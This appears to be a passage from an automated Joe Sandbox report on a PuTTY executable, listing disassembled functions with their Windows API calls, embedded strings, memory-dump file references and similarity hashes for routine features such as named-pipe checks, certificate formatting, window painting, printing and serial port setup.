Part of subcall function 00BDCA80: CopySid.ADVAPI32(00000000,00000000,00000000), ref: 00BDCB6A
Part of subcall function 00BDCA80: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB8B
Part of subcall function 00BDCA80: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB9A
Part of subcall function 00BDCA80: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCBA5

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00C308C8,?), ref: 00C307E7
GetLastError.KERNEL32(?,?,?,?,?,?,00C308C8,?), ref: 00C307ED

Part of subcall function 00BDD3E0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BD711E,?), ref: 00BDD46B
Part of subcall function 00BDD3E0: _strlen.LIBCMT ref: 00BDD476

CloseHandle.KERNEL32(00000000,?,?,?,?,?,00C308C8,?), ref: 00C30825
GetLastError.KERNEL32(?,?,?,?,?,00C308C8,?), ref: 00C3082B
EqualSid.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00C308C8,?), ref: 00C30847
LocalFree.KERNEL32(?,?,?,?,?,?,?,00C308C8,?), ref: 00C30854

Strings

Owner of named pipe '%s' is not us, xrefs: 00C3086D
strncmp(pipename, "\\\\.\\pipe\\", 9) == 0, xrefs: 00C30731
Unable to get user SID: %s, xrefs: 00C3083B
Unable to get named pipe security information: %s, xrefs: 00C307FD
\\.\pipe\, xrefs: 00C30718
strchr(pipename + 9, '\\') == NULL, xrefs: 00C30757
Unable to open named pipe '%s': %s, xrefs: 00C30815
Error waiting for named pipe '%s': %s, xrefs: 00C307B5
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/named-pipe-client.c, xrefs: 00C3072C, 00C30752

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorLast$CloseHandle$Local$FreeProcess$AllocCopyCreateCurrentEqualFileFormatLengthMessageNamedOpenPipeWait___from_strstr_to_strchr_strlen
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/named-pipe-client.c$Error waiting for named pipe '%s': %s$Owner of named pipe '%s' is not us$Unable to get named pipe security information: %s$Unable to get user SID: %s$Unable to open named pipe '%s': %s$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0
API String ID: 1975913820-3978821697
Opcode ID: b8948cbd5cf7b450c51ea37c6066eb6f12087375080306c6733fc83b050f3a10
Instruction ID: ab8efb69d80b2752495c4145a0b5024152a99b73a3726bcf53e2c4f2a1d05683
Opcode Fuzzy Hash: b8948cbd5cf7b450c51ea37c6066eb6f12087375080306c6733fc83b050f3a10
Instruction Fuzzy Hash: 4B41B872A40204BBE6103B70AC5EF2F3A98AF45B59F14043DF945E62D2EA61990187E7

Function 00C2BA40 Relevance: 38.8, APIs: 2, Strings: 20, Instructions: 265COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00C2BB5C
_strftime.LIBCMT ref: 00C2BBCE

Strings

host, xrefs: 00C2BAA6
cert_valid_before, xrefs: 00C2BB14
cert_extension_data, xrefs: 00C2BC1F
%Y-%m-%d %H:%M:%S UTC, xrefs: 00C2BB51, 00C2BBC3
cert_extension, xrefs: 00C2BC24
cert_critical_option, xrefs: 00C2BC0D
cert_ca_key, xrefs: 00C2BC3A
cert_nonce, xrefs: 00C2BA77
cert_ca_key_algorithm_id, xrefs: 00C2BC87, 00C2BD23
cert_critical_option_data, xrefs: 00C2BC08
cert_valid_before_date, xrefs: 00C2BBEC
user, xrefs: 00C2BAAD
cert_ca_sig, xrefs: 00C2BD3D
cert_ca_key_, xrefs: 00C2BCCA
cert_serial, xrefs: 00C2BA8B
cert_valid_principal, xrefs: 00C2BAED
cert_valid_after, xrefs: 00C2BB00
cert_key_id, xrefs: 00C2BAD8
cert_valid_after_date, xrefs: 00C2BB7A
cert_type, xrefs: 00C2BAB2, 00C2BAC5

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strftime
String ID: %Y-%m-%d %H:%M:%S UTC$cert_ca_key$cert_ca_key_$cert_ca_key_algorithm_id$cert_ca_sig$cert_critical_option$cert_critical_option_data$cert_extension$cert_extension_data$cert_key_id$cert_nonce$cert_serial$cert_type$cert_valid_after$cert_valid_after_date$cert_valid_before$cert_valid_before_date$cert_valid_principal$host$user
API String ID: 1867682108-3603795471
Opcode ID: 7e46d4f77e4073fa81f59d41c512f0aa8a575cf1a380fbcf838a90a7cbf08a01
Instruction ID: 3332114be9b8f573882e3dd342aea381f063dc66a885bbb22497477fe092d94e
Opcode Fuzzy Hash: 7e46d4f77e4073fa81f59d41c512f0aa8a575cf1a380fbcf838a90a7cbf08a01
Instruction Fuzzy Hash: AE8174B6900200BFE711BF54EC42D6EF7E5EF58704F044868F94997252E732A924DB96

Function 00BC4E40 Relevance: 37.6, APIs: 25, Instructions: 149COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00BC4E78
CreateCompatibleDC.GDI32(00000000), ref: 00BC4E9E
SelectObject.GDI32(00000000), ref: 00BC4EAD
_strlen.LIBCMT ref: 00BC4EB4
GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 00BC4EC4
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000016), ref: 00BC4EE3
InvalidateRect.USER32(?,00000000,00000000), ref: 00BC4EEE
DeleteDC.GDI32(00000000), ref: 00BC4EF5
DefWindowProcA.USER32(?,?,?,?), ref: 00BC4F02
BeginPaint.USER32(?,?), ref: 00BC4F15
SelectObject.GDI32(00000000), ref: 00BC4F2A
GetStockObject.GDI32(00000007), ref: 00BC4F2E
SelectObject.GDI32(00000000,00000000), ref: 00BC4F36
CreateSolidBrush.GDI32 ref: 00BC4F3E
SelectObject.GDI32(00000000,00000000), ref: 00BC4F4A
GetClientRect.USER32(?,?), ref: 00BC4F55
Rectangle.GDI32(00000000,?,?,?,?), ref: 00BC4F6C
GetWindowTextLengthA.USER32(?), ref: 00BC4F73
GetWindowTextA.USER32(?,00000000,00000001), ref: 00BC4F94
SetTextColor.GDI32(00000000), ref: 00BC4FA1
SetBkColor.GDI32(00000000), ref: 00BC4FAE
TextOutA.GDI32(00000000,?,?,00000000,00000000), ref: 00BC4FC7
SelectObject.GDI32(00000000), ref: 00BC4FDA
DeleteObject.GDI32(?), ref: 00BC4FE4
EndPaint.USER32(?,?), ref: 00BC4FF0

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Object$SelectText$Window$Delete$ColorCreatePaintRect$BeginBrushClientCompatibleExtentInvalidateLengthPoint32ProcRectangleSolidStock_strlen
String ID:
API String ID: 2408264671-0
Opcode ID: 1ae61929dd65e5987c697ce0efd186ff48f53a83b77a637ca74d36977cf5ebcd
Instruction ID: d204e1878364eb9cd4d2d71ffe4bd4d2ec8aecb9de901084cbd9f89e2785c273
Opcode Fuzzy Hash: 1ae61929dd65e5987c697ce0efd186ff48f53a83b77a637ca74d36977cf5ebcd
Instruction Fuzzy Hash: EE518E72104204EFD7119F60EC8CF6F7BACEB89755F01442EFA46C2160DB759912EB66

Function 00BA84F0 Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 181windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00BA85D3
GetDeviceCaps.GDI32(00000000,00000026), ref: 00BA85DE
CreatePalette.GDI32 ref: 00BA85F5
SelectPalette.GDI32(00000000,00000000,00000000), ref: 00BA8612
RealizePalette.GDI32(00000000), ref: 00BA8615
GetStockObject.GDI32(0000000F), ref: 00BA861D
SelectPalette.GDI32(00000000,00000000,00000000), ref: 00BA8627
SetPaletteEntries.GDI32(?,?,?,?), ref: 00BA8685
GetDC.USER32(00000000), ref: 00BA8697
SelectPalette.GDI32(00000000,00000000), ref: 00BA86AC
UnrealizeObject.GDI32 ref: 00BA86BA
RealizePalette.GDI32(00000000), ref: 00BA86C1
GetStockObject.GDI32(0000000F), ref: 00BA86E9
SelectPalette.GDI32(00000000,00000000,00000000), ref: 00BA86F3
ReleaseDC.USER32(00000000), ref: 00BA8700
InvalidateRect.USER32(00000000,00000001), ref: 00BA8722
ReleaseDC.USER32(00000000), ref: 00BA8736

Strings

ncolours <= OSC4_NCOLOURS - start, xrefs: 00BA8530
start <= OSC4_NCOLOURS, xrefs: 00BA850E
wgs.term_hwnd, xrefs: 00BA86DA
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00BA8509, 00BA852B, 00BA86D5

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Palette$Select$Object$RealizeReleaseStock$CapsCreateDeviceEntriesInvalidateRectUnrealize
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$ncolours <= OSC4_NCOLOURS - start$start <= OSC4_NCOLOURS$wgs.term_hwnd
API String ID: 3328073877-2827769490
Opcode ID: f9bdb19a78a57af85ac8a32d67af9d320428ef83a5a05b39fe023682a26996e6
Instruction ID: b4d58da3d3457b439aba9e463b834ba22a6c96741d80ac396e42bdf6a251415e
Opcode Fuzzy Hash: f9bdb19a78a57af85ac8a32d67af9d320428ef83a5a05b39fe023682a26996e6
Instruction Fuzzy Hash: 1A5144B1608350AFE7119F34EC5EF2E7BA4EB17309F0400AAF945D76A1DE758942D724

Function 00BDF600 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BDBFB0: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BEA190,kernel32.dll), ref: 00BDBFCF

GetProcAddress.KERNEL32(00000000,EnumPrintersA), ref: 00BDF63B
GetProcAddress.KERNEL32(00000000,OpenPrinterA), ref: 00BDF648
GetProcAddress.KERNEL32(00000000,ClosePrinter), ref: 00BDF655
GetProcAddress.KERNEL32(00000000,StartDocPrinterA), ref: 00BDF662
GetProcAddress.KERNEL32(00000000,EndDocPrinter), ref: 00BDF66F
GetProcAddress.KERNEL32(00000000,StartPagePrinter), ref: 00BDF67C
GetProcAddress.KERNEL32(00000000,EndPagePrinter), ref: 00BDF689
GetProcAddress.KERNEL32(00000000,WritePrinter), ref: 00BDF696

Strings

StartDocPrinterA, xrefs: 00BDF65C
StartPagePrinter, xrefs: 00BDF676
ClosePrinter, xrefs: 00BDF64F
OpenPrinterA, xrefs: 00BDF642
EndDocPrinter, xrefs: 00BDF669
winspool.drv, xrefs: 00BDF60F
EndPagePrinter, xrefs: 00BDF683
spoolss.dll, xrefs: 00BDF61E
WritePrinter, xrefs: 00BDF690
EnumPrintersA, xrefs: 00BDF635

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: ClosePrinter$EndDocPrinter$EndPagePrinter$EnumPrintersA$OpenPrinterA$StartDocPrinterA$StartPagePrinter$WritePrinter$spoolss.dll$winspool.drv
API String ID: 2238633743-2130675966
Opcode ID: 5f2650e806d779979d02520ebc81bc756128a5b7156d6b79ac55dd36e1ad43a5
Instruction ID: 2b3be1068b2158d08e330fb9cb16bec02552065ca604561edcc54d54bf8ae5a5
Opcode Fuzzy Hash: 5f2650e806d779979d02520ebc81bc756128a5b7156d6b79ac55dd36e1ad43a5
Instruction Fuzzy Hash: E8117F70902B54AEE700AF21AC05B7EBAD4EB92B4CF09903EE400876B5E7F40605CF99

Function 00BAAD44 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 336COMMON

Download Yara Rule

APIs

Part of subcall function 00BA5EB0: _strlen.LIBCMT ref: 00BA5EC1

__fread_nolock.LIBCMT ref: 00BAAFA1

Part of subcall function 00BA5DA0: DeleteObject.GDI32(00000000), ref: 00BA5DE1
Part of subcall function 00BA5DA0: DestroyIcon.USER32(FFFFFFFF,00000000,?,?,00BAB1A1,00000001,?,?,?,?,?,00BA5C06,?,00BA2A54), ref: 00BA5DF0
Part of subcall function 00BA5DA0: DeleteObject.GDI32(?), ref: 00BA5E18
Part of subcall function 00BA5DA0: CoUninitialize.OLE32(00000001,?,?,?,?,?,00BA5C06,?,00BA2A54), ref: 00BA5E2D

Strings

-demo-terminal, xrefs: 00BAAEF3
demo-server.example.com, xrefs: 00BAB02C, 00BAB112
%s expects input and output filenames, xrefs: 00BAAFE2
option "%s" requires an argument, xrefs: 00BAAE01
-pgpfp, xrefs: 00BAAE6A
This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?, xrefs: 00BAB09A
-cleanup, xrefs: 00BAAE54
--host-ca, xrefs: 00BAAE9F
unexpected argument "%s", xrefs: 00BAAFCC
%s expects an output filename, xrefs: 00BAAFD7
--host_ca, xrefs: 00BAAECB
%s Warning, xrefs: 00BAB0AA
-demo-config-box, xrefs: 00BAAEE1
can't open input file '%s', xrefs: 00BAAF6F
unknown option "%s", xrefs: 00BAAF0F

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: DeleteObject$DestroyIconUninitialize__fread_nolock_strlen
String ID: %s Warning$%s expects an output filename$%s expects input and output filenames$--host-ca$--host_ca$-cleanup$-demo-config-box$-demo-terminal$-pgpfp$This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?$can't open input file '%s'$demo-server.example.com$option "%s" requires an argument$unexpected argument "%s"$unknown option "%s"
API String ID: 3701376555-528882638
Opcode ID: 00944c7fde88d03b4b1d70893428ad57279df14d5d475c6a52493845ed9d19ed
Instruction ID: cf246c26e878eaf0e6cdb4bb23e5047a672a93f32b8e7aadade0dc5e249aa102
Opcode Fuzzy Hash: 00944c7fde88d03b4b1d70893428ad57279df14d5d475c6a52493845ed9d19ed
Instruction Fuzzy Hash: DE911BB594820076E93136206C83F7F36D8CB6374AF0804B9FD49652C3F7A69A55D2B7

Function 00BA6480 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 167windowCOMMON

Download Yara Rule

APIs

CreatePopupMenu.USER32 ref: 00BA64AC
AppendMenuA.USER32(00000000,00000000,00000400,?), ref: 00BA64E1
DeleteMenu.USER32(?,00000000), ref: 00BA6605
DeleteMenu.USER32(00000200,00000000), ref: 00BA6614
InsertMenuA.USER32(00000010,00000010,00000000,S&pecial Command), ref: 00BA6632
InsertMenuA.USER32(00000010,00000800,00000200,00000000), ref: 00BA6648
DeleteMenu.USER32(?,00000000), ref: 00BA6664
DeleteMenu.USER32(00000200,00000000), ref: 00BA6673
InsertMenuA.USER32(00000010,00000010,00000000,S&pecial Command), ref: 00BA6691
InsertMenuA.USER32(00000010,00000800,00000200,00000000), ref: 00BA66A7

Strings

nesting < 2, xrefs: 00BA6573
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00BA6515, 00BA656E
S&pecial Command, xrefs: 00BA6622, 00BA6681
IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX, xrefs: 00BA651A

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Menu$DeleteInsert$AppendCreatePopup
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX$S&pecial Command$nesting < 2
API String ID: 1803796953-3159962390
Opcode ID: 4f4fddfeef5de186a66cff9eeb0b12a3d38eeae6d1003aa2244067a8dbb083d2
Instruction ID: 619b9d41e47b063c361c9cc49761919f5fb5d0940d442e15d19a1bb5fed541ed
Opcode Fuzzy Hash: 4f4fddfeef5de186a66cff9eeb0b12a3d38eeae6d1003aa2244067a8dbb083d2
Instruction Fuzzy Hash: 1251E2F0B04308BBEB145F54EC5AF2A7BE6EB95B04F18442DF605DB2E1DAB1AC119B44

Function 00BCCA10 Relevance: 28.1, APIs: 5, Strings: 11, Instructions: 146timeCOMMON

Download Yara Rule

APIs

GetCommState.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00BCC820,?), ref: 00BCCA2C
SetCommState.KERNEL32(00000000,?), ref: 00BCCB6F
SetCommTimeouts.KERNEL32(00000000), ref: 00BCCBA4
GetLastError.KERNEL32 ref: 00BCCBB3

Part of subcall function 00BDD3E0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BD711E,?), ref: 00BDD46B
Part of subcall function 00BDD3E0: _strlen.LIBCMT ref: 00BDD476

GetLastError.KERNEL32 ref: 00BCCBCA

Strings

Configuring %s flow control, xrefs: 00BCCB5D
Invalid number of stop bits (need 1, 1.5 or 2), xrefs: 00BCCB12
Configuring %s, xrefs: 00BCCAB4
Configuring serial port: %s, xrefs: 00BCCBDA
Configuring %s parity, xrefs: 00BCCAE0
DSR/DTR, xrefs: 00BCCB57
XON/XOFF, xrefs: 00BCCB29
Configuring baud rate %lu, xrefs: 00BCCA62
RTS/CTS, xrefs: 00BCCB42
Configuring serial timeouts: %s, xrefs: 00BCCBC3
Configuring %u data bits, xrefs: 00BCCA85

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Comm$ErrorLastState$FormatMessageTimeouts_strlen
String ID: Configuring %s$Configuring %s flow control$Configuring %s parity$Configuring %u data bits$Configuring baud rate %lu$Configuring serial port: %s$Configuring serial timeouts: %s$DSR/DTR$Invalid number of stop bits (need 1, 1.5 or 2)$RTS/CTS$XON/XOFF
API String ID: 617136254-604002008
Opcode ID: 2ec0a872f73fa705bb1f9a9efdc5125e28dc35f4a8f262c667e384fbdd69800c
Instruction ID: b06baa0158469a706d87f59155beef66b077db03663fa9a6a04dda8b0cde04a4
Opcode Fuzzy Hash: 2ec0a872f73fa705bb1f9a9efdc5125e28dc35f4a8f262c667e384fbdd69800c
Instruction Fuzzy Hash: 6841D4B19043046BD700AF24AC4AF1B7AD8EB54714F4808BEFD8D97292F675DD148797

Function 00C07D70 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 373COMMON

Download Yara Rule

APIs

_strspn.LIBCMT ref: 00C07D8C
_strcspn.LIBCMT ref: 00C07DD2
_strspn.LIBCMT ref: 00C07E05
_strlen.LIBCMT ref: 00C07E2F
_strspn.LIBCMT ref: 00C07E4A
_strlen.LIBCMT ref: 00C080EB
_strspn.LIBCMT ref: 00C0810B
_strlen.LIBCMT ref: 00C0818B
_strspn.LIBCMT ref: 00C081A1

Strings

0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/, xrefs: 00C07DFF
MD5:, xrefs: 00C07E16
0123456789abcdefABCDEF:, xrefs: 00C07E44
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=, xrefs: 00C08105, 00C0819B
SHA256:, xrefs: 00C07DEA

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strspn$_strlen$_strcspn
String ID: 0123456789abcdefABCDEF:$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=$MD5:$SHA256:
API String ID: 1973092097-3738422337
Opcode ID: e93bd0d74f21b517c87b8a3e68cd51b17f8b615b3ada2e951731ee5333a5ea00
Instruction ID: 23f63101063b11f5fc02c22d25110369e31dbe82a2dd748a2783a50702255582
Opcode Fuzzy Hash: e93bd0d74f21b517c87b8a3e68cd51b17f8b615b3ada2e951731ee5333a5ea00
Instruction Fuzzy Hash: 6BC1E380F047A227EF275114442433BAA8A5B86B4CF58C66BD4D5472C6EEB59F8FC3D2

Function 00BBF9D0 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 214windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BBFA16
MapDialogRect.USER32(?,?), ref: 00BBFB0F
CreateWindowExA.USER32(00000200,EDIT,?,?,?,?,?,?,?,?,00000000), ref: 00BBFB4A
SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00BBFB56
MapDialogRect.USER32(?,000000B0), ref: 00BBFC34
GetDlgItem.USER32(?,00000001), ref: 00BBFC3B
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,0000000D), ref: 00BBFC52
MapDialogRect.USER32(?,00000000), ref: 00BBFC7E
GetWindowRect.USER32(?,00000000), ref: 00BBFCAF
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,0000012C,0000000E), ref: 00BBFCD2
ShowWindow.USER32(?,00000001), ref: 00BBFCDB

Strings

P, xrefs: 00BBFA60
STATIC, xrefs: 00BBFAEA
EDIT, xrefs: 00BBFB40
d, xrefs: 00BBFA44

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$Rect$Dialog$MessageSend$CreateItemShow
String ID: EDIT$P$STATIC$d
API String ID: 2328128272-163579123
Opcode ID: 33de657200ff0fbae4c4309716a6ac3f35ff6fbaaeca0b10b4f566a72197d71a
Instruction ID: c839f7a88e5b77bb2198bac6e5595d925ca0a384855d494866a5a5d3f32ec3e9
Opcode Fuzzy Hash: 33de657200ff0fbae4c4309716a6ac3f35ff6fbaaeca0b10b4f566a72197d71a
Instruction Fuzzy Hash: 2F815871508304AFE7508F54CC84B6FBBE5FB88744F50482DFA899B2A0C7B5E945CB92

Function 00BDC920 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetSecurityInfo), ref: 00BDC956
GetProcAddress.KERNEL32(00000000,SetSecurityInfo), ref: 00BDC97C
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00BDC9A2
GetProcAddress.KERNEL32(00000000,GetTokenInformation), ref: 00BDC9C8
GetProcAddress.KERNEL32(00000000,InitializeSecurityDescriptor), ref: 00BDC9EA
GetProcAddress.KERNEL32(00000000,SetSecurityDescriptorOwner), ref: 00BDCA08
GetProcAddress.KERNEL32(00000000,SetEntriesInAclA), ref: 00BDCA2B

Strings

GetSecurityInfo, xrefs: 00BDC950
InitializeSecurityDescriptor, xrefs: 00BDC9E4
GetTokenInformation, xrefs: 00BDC9C2
OpenProcessToken, xrefs: 00BDC99C
SetEntriesInAclA, xrefs: 00BDCA25
SetSecurityInfo, xrefs: 00BDC976
SetSecurityDescriptorOwner, xrefs: 00BDCA02
advapi32.dll, xrefs: 00BDC936

Memory Dump Source

